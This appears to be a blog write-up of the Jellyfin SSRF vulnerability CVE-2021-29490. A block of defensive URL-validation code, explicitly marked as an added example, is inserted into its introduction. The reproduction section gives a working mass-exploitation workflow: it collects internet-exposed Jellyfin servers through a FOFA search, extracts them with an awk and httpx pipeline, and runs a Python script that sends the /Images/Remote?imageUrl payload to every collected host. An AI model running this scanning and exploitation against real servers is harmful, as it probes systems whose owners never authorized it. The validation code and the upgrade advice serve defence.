xfeng



CVE-2021-29490-Jellyfin-SSRF

1. Vulnerability Introduction#

Jellyfin is a free software media system that lets you manage and stream your own media. It is an alternative to the proprietary Emby and Plex, serving media from a dedicated server to end-user devices through multiple client apps. Jellyfin descends from Emby 3.5.2 and was ported to the .NET Core framework for full cross-platform support. There are no strings attached: it is simply a team that wants to build something better and works together to achieve it, committed to making the best media system accessible to all users.

There is an SSRF vulnerability in Jellyfin's RemoteImageController.cs: the server fetches the URL passed in the imageUrl parameter on the requester's behalf, so a specially constructed request can be used to probe hosts on the internal network.
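What the fix has to guarantee is that the server-side fetch can only reach public destinations. The following is an added example (not code from the post or from the Jellyfin project) of a validation gate placed in front of such a fetch: it allows only http/https, rejects embedded credentials, resolves the host, and refuses any answer that falls in loopback, private, link-local or other non-public ranges. The function names, the stub DNS table and the sample addresses are assumptions constructed for the example; the real resolver is only used when the stub is not supplied.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Ranges an image fetcher must never reach: "this host", RFC 1918, shared
# address space, loopback, link-local (which covers cloud metadata services),
# and their IPv6 counterparts. IPv4-mapped IPv6 is refused outright.
_BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]

# Constructed lookup table standing in for DNS so the example runs offline.
_STUB_DNS = {
    "images.example.com": ["93.184.216.34"],
    "nas.internal": ["10.0.0.5"],
    "split.example.com": ["93.184.216.34", "192.168.1.20"],
}


def resolve_all(host):
    """Every A/AAAA answer for host, via real DNS."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def stub_resolver(host):
    """Offline substitute for resolve_all() backed by the constructed table."""
    if host not in _STUB_DNS:
        raise OSError(f"no such host: {host}")
    return list(_STUB_DNS[host])


def is_blocked_address(addr):
    """True if addr is not a routable public address."""
    ip = ipaddress.ip_address(addr)
    if (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified):
        return True
    return any(ip in net for net in _BLOCKED_NETWORKS)


def validate_remote_image_url(image_url, resolver=resolve_all):
    """Gate in front of the server-side fetch. Returns (allowed, reason, addrs).

    The vulnerable pattern is simply fetching image_url as received. The
    caller of this gate should connect to one of the returned addresses
    instead of resolving the name again, so a changed DNS answer between
    check and fetch (DNS rebinding) cannot bypass the check.
    """
    parsed = urlparse(image_url)
    if parsed.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parsed.scheme or '(none)'}", []
    host = parsed.hostname
    if not host:
        return False, "no host in URL", []
    if parsed.username or parsed.password:
        return False, "credentials embedded in URL", []
    try:
        ipaddress.ip_address(host)          # literal IP: nothing to resolve
        addrs = [host]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"could not resolve {host}: {exc}", []
    if not addrs:
        return False, f"{host} has no addresses", []
    # Every answer must be public: a name with one public and one private
    # record is rejected, because the fetcher cannot know which it will hit.
    for addr in addrs:
        if is_blocked_address(addr):
            return False, f"{host} resolves to blocked address {addr}", []
    return True, "ok", addrs


if __name__ == "__main__":
    for url in ("https://images.example.com/poster.jpg", "http://nas.internal/",
                "http://127.0.0.1:8096/System/Info", "ftp://images.example.com/x"):
        print(url, "->", validate_remote_image_url(url, stub_resolver)[:2])
```

Resolving every record and rejecting the whole name if any record is non-public is deliberately strict; an allowlist of known image hosts is stricter still and is the better choice where the set of legitimate sources is known.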

2. Affected Versions#

Jellyfin < 10.7.2

3. Vulnerability Reproduction#

/Images/Remote?imageUrl=http://www.baidu.com

The FOFA fingerprint is "Jellyfin" && port="8096"; assets are collected in bulk with the Fofa Collection Tool.exe.


The collected asset results will be saved to a result.csv file in the same directory.


Extract the IPs or domain names with a shell pipeline:

cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt

Then use a Python script for batch verification.

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silence the warning that verify=False would otherwise print for every host.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def Jellyfin():
    with open("Jellyfin.txt") as file:
        for line in file:
            # Strip the trailing newline; otherwise it ends up inside the URL.
            target = line.strip()
            if not target:
                continue
            vuln_url = target + "/Images/Remote?imageUrl=http://www.baidu.com"

            try:
                response = requests.get(url=vuln_url, verify=False, timeout=10)
                if response.status_code == 200:
                    print(vuln_url)
            except Exception:
                # Unreachable host or timeout: skip it.
                continue

def main():
    Jellyfin()

if __name__ == '__main__':
    main()


4. Vulnerability Fix#

Upgrade to Jellyfin 10.7.2 or later.

For information about SSRF vulnerabilities, you can refer to this blog post:

Web Security: SSRF Vulnerabilities
